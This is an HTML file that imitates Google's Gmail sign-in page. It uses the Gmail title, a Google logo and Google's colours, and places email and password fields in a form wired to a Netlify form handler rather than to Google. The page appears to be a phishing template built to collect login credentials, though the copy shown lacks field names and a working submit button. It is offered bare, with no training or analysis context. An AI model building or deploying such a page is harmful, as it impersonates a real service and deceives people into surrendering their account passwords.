<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="UTF-8">
    <meta http-equiv="X-UA-Compatible" content="IE=edge">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <title>Gmail</title>
    <link rel="shortcut icon" href="favicon.ico" type="image/x-icon">
    <!-- Compiled and minified CSS -->
    <link rel="stylesheet" href="https://cdnjs.cloudflare.com/ajax/libs/materialize/1.0.0/css/materialize.min.css">

    <!-- Compiled and minified JavaScript -->
    <script src="https://cdnjs.cloudflare.com/ajax/libs/materialize/1.0.0/js/materialize.min.js"></script>
        
    <style>
        input[type=email],
        input[type=password] {
            padding-left: 10px !important;
        }
         /* label color */
        .input-field label {
            color: #5f6368 !important;
            padding-left: 10px !important;
        }
        /* label focus color */
        .input-field input[type=email]:focus + label,
        .input-field input[type=password]:focus + label {
            color: #1a73e8 !important;
        }
        /* label underline focus color */
        .input-field input[type=email]:focus,
        .input-field input[type=password]:focus {
            border-left: 2px solid #1a73e8 !important;
            border-top: 2px solid #1a73e8 !important;
            border-right: 2px solid #1a73e8 !important;
            border-bottom: 1px solid #1a73e8 !important;
        }
        /* valid color */
        .input-field input[type=email].valid,
        .input-field input[type=password].valid {
            border-left: 2px solid #1a73e8 !important;
            border-top: 2px solid #1a73e8 !important;
            border-right: 2px solid #1a73e8 !important;
            border-bottom: 1px solid #1a73e8 !important;
        }
        /* invalid color */
        .input-field input[type=email].invalid,
        .input-field input[type=password].invalid {
            border-left: 2px solid #1a73e8 !important;
            border-top: 2px solid #1a73e8 !important;
            border-right: 2px solid #1a73e8 !important;
            border-bottom: 1px solid #1a73e8 !important;
        }
        /* icon prefix focus color */
        .input-field .prefix.active {
            color: #1a73e8 !important;
        }
        @import url('https://fonts.googleapis.com/css2?family=Noto+Sans&display=swap');
        @import url('https://fonts.googleapis.com/css2?family=Roboto&display=swap');
        html{
            height:100%;
        }
        body {
            height:100%;
            text-align: center;
        }
        img {
            margin-top: 47px;
            width: 75px;
        }
        form {
            width: 85%;
            margin: 0 auto;
        }
        input {
            border: 1px solid lightgray !important;
            border-radius: 5px !important;
        }
        #main {
            position: absolute;
            margin: auto;
            margin-top: 40px;
            border: 1px solid lightgray;
            border-radius: 8px !important;
            top: 0;
            right: 0;
            bottom: 0;
            left: 0;
            width: 450px;
            min-height: 500px;
            /* background-color: #ccc; */
            border-radius: 3px;
        }
        .sans {
            font-family: 'Noto Sans', sans-serif;
        }
        .roboto {
            font-family: 'Roboto', sans-serif;
        }
        #signin {
            font-size: 24px;
            margin-top: 3px;
        }
        #continue {
            font-size: 16px;
            margin-top: -15px;
        }
        #forgot {
            margin-top: -60px !important;
            margin-left: 45px;
            text-align: left;
            color: #1a73e8;
        }
        #noturpc {
            color: #5f6368;
            text-align:left;
            margin-left: 40px;
        }
        #create {
            color: #1a73e8;
            text-align: left;
            margin-left: 40px;
            font-weight: bold;
        }
        .btn {
            background-color: #1b66c9;
            text-align: right;
        }
        .btn:hover {
            background-color: #1452a1;
        }
    </style>
</head>
<body>
    <div id="main">
        <img src="google_logo.png" alt="Google Logo">
        <p class="sans" id="signin">Sign in</p>
        <p class="roboto" id="continue">to continue to Gmail</p>
        <form name="contact" method="POST" data-netlify="true">
            <div class="row">
                <div class="input-field col s12">
                    <input id="email" type="email" class="validate">
                    <label for="email">Email or phone</label>
                </div>
                <div class="input-field col s12">
                    <input id="password" type="password" class="validate">
                    <label for="password">Enter your password</label>
                </div>
              </div>
        </form>
        <p class="roboto" id="forgot"><b>Forgot email?</b></p>
        <a class="waves-effect waves-light btn">Sign in</a>
        <br>
        <p class="roboto" id="noturpc">Not your computer? Use a private browsing window to sign in. <span style="color: #1a73e8;">Learn more</span></p>
        <br>
        <p class="sans" id="create">Create Account</p>
        <br><br>
    </div>
</body>
</html>
